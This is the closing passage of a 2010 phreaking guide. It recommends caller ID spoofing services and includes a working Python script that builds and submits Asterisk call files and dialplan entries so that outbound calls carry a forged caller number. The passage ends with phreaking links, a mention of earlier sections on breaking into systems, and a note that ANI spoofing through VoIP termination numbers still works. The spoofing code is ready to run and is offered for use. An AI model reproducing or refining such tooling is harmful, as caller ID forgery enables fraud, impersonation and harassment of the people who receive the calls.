mention all the caller ID spoofing providers out there. The two main ones
these days are phonegangster.com and of course spoofcard.com. Personally
if you have to go this route I would suggest using spoofcard.com. It has
an option to change your voice, though I haven't really used it before so
I can't tell you how well it works. There's also SpoofApp
(www.spoofapp.com), which if you have an iPhone handy allows you to
forward any outgoing calls through the spoofcard service. The choice is
yours, but I would really suggest to just use the asterisk technique
assuming you don't need much mobility in your spoofing.

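To tie the asterisk procedure above together, here is an added example
(my own, not the guide's code) that generates the call file and the
dialplan context it points at, refuses numbers that are not ten NANP
digits, and installs the call file into the spool with an atomic rename
instead of cp. The trunk string, the "spoofing" context name and every
phone number are the guide's placeholders or constructed values; the
temporary directory is assumed to be /var/spool/asterisk/tmp so that it
sits on the same filesystem as the outgoing spool.

```python
"""Build and submit an asterisk call file for a spoofed-CPN call.

Added example. TRUNK and the numbers are placeholders from the guide;
/var/spool/asterisk/tmp is assumed to exist on the same filesystem as
/var/spool/asterisk/outgoing.
"""
import os
import re
import tempfile

NANP = re.compile(r"^[2-9]\d{2}[2-9]\d{6}$")            # 10-digit NPA-NXX-XXXX
TRUNK = "IAX2/username:password@provideraddress.com"   # placeholder trunk


def check_number(n):
    """Reject anything that is not a dialable 10-digit NANP number."""
    if not NANP.match(n):
        raise ValueError("not a 10-digit NANP number: %r" % (n,))
    return n


def render_call_file(my_number, dest_number, spoof_number,
                     trunk=TRUNK, context="spoofing"):
    """Call file text: first leg rings my_number, then the dialplan
    context dials dest_number with the CallerID set here."""
    my_number, dest_number, spoof_number = map(
        check_number, (my_number, dest_number, spoof_number))
    return (
        "Channel: %s/1%s\n" % (trunk, my_number)
        + "CallerID: %s\n" % spoof_number
        + "MaxRetries: 5\nRetryTime: 60\nWaitTime: 30\n"
        + "Context: %s\nExtension: %s\nPriority: 1\n" % (context, dest_number)
    )


def render_dialplan(trunk=TRUNK, context="spoofing"):
    """extensions.conf stanza the call file names. Dial() inherits the
    channel's CallerID, so the spoofed number rides the outbound leg."""
    return (
        "[%s]\n" % context
        + "exten => _NXXNXXXXXX,1,Dial(%s/1${EXTEN},60)\n" % trunk
        + "exten => _NXXNXXXXXX,n,Hangup()\n"
    )


def submit_call_file(text, spool_dir="/var/spool/asterisk/outgoing",
                     tmp_dir="/var/spool/asterisk/tmp", name="spoof.call"):
    """Write on the same filesystem, then rename(2) into the spool.
    Asterisk acts on a file as soon as it appears, and a plain cp can
    expose a half-written file to it."""
    fd, tmp_path = tempfile.mkstemp(dir=tmp_dir, prefix=".spoof-")
    with os.fdopen(fd, "w") as f:
        f.write(text)
    dest = os.path.join(spool_dir, name)
    os.replace(tmp_path, dest)   # atomic on the same filesystem
    return dest


if __name__ == "__main__":
    # Constructed numbers in the guide's NPA-NXX-1337 / 5148 / 6798 pattern.
    call_file = render_call_file("2125551337", "2125555148", "2125556798")
    print(call_file)
    print(render_dialplan())
```

Run it as root on the asterisk box and add the printed stanza to
extensions.conf before calling submit_call_file(); if your provider's
trunk is SIP rather than IAX2 the only change is the trunk string, since
the call file and dialplan syntax are the same.
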


Section 7: Suggested Links
---------------------------

Well I was planning on continuing this guide with a section on asterisk,
but in retrospect there was just too much information out there to really
add anything useful. So instead I will just include links on how to
install and configure asterisk. You should consider trying it out. Setting
up your own voicemail system, conference bridge, diverter, etc. are just a
few of the things you can do with asterisk, so it comes highly
recommended. I provided a link to download asterisk, but if you need help
installing and setting up asterisk try the link below...

www.asteriskguru.com

This site includes installation guides and everything else you could need
to help set up asterisk on your own LAN. Now that I'm done with that I
should suggest some links for basic information on telephony. As you might
have noticed I didn't spare the acronyms in this guide, and didn't even
bother explaining half the terminology I used. So if you found yourself
confused reading this guide then I'd suggest the two following links..

www.tech-faq.com/telephone-wiring.shtml
http://pt.com/page/tutorials/ss7-tutorial

The first link will guide you through the inner workings of most of the
protocols and terminology I went over briefly over the course of this
guide, and the second link is a basic tutorial on CCSS7 (SS7), which is
the signaling protocol the PSTN currently runs on (until the FCC decides
to convert it all). You will need to read through both to understand how
the phone system operates, and if you're interested in truly exploring
the system I'd suggest studying them in depth. Also as promised is a
brief text on DATU lines in case they're present in your LEC...

http://www.nettwerked.net/datu.txt

Now finally are my brief suggestions on sites to follow..

www.informationleak.net - As always this is my first suggestion. I'm not
nearly as active on IL as I used to be, but Halla has been doing a great
job of keeping the site alive and there is always an active community here
that keeps all the information (including the phreaking bit) up-to-date.
So keep track.

www.oldskoolphreak.com - This site isn't nearly as active as it used to
be, but there are still some decent guides on it and it's updated every
now and then. Still a somewhat decent reference for some information.

www.binrev.com - Besides IL I'd absolutely suggest this forum for
up-to-date phreaking information. The community has a lot of sections, but
the phreaking section is very active and is definitely worth a check.



Section 8: The Conclusion
--------------------------

Well this is by far the longest I've slacked on any tutorial I had in
mind. I had been thinking about writing this update since at least 2008,
but for one reason or another always delayed it. Some decent reasons, but
mostly just laziness. As before I hope that I've grabbed your interest in
phreaking, but I'd like you to keep in mind that there is much (and MUCH
and MUCH) more to phreaking than breaking the law. All the sections I
wrote on breaking into random systems were more or less just teasers, but
I hope out of this and playing around with all of it you've snagged some
sort of appreciation for telephony and will continue from here. If this
guide grabbed your interest by all means learn what you can. If this is
really your first introduction to telephony there is a lot to be learned
and I hope you find it as fascinating as I do. I'm willing to help where I
can, but I can't help everyone. I've included some contact information
below if you need more help. I can't promise you any immediate help, but
I'll help who I have time for.


Murder Mouse
fuck copyright, 2010

pla229 [skat] gmail [rot] com

Yahoo! ID: murder_mouse


(Update: Op diverting through Google Voice no longer works. It was fun
while it lasted, but you can still ANI spoof through voip termination
numbers.)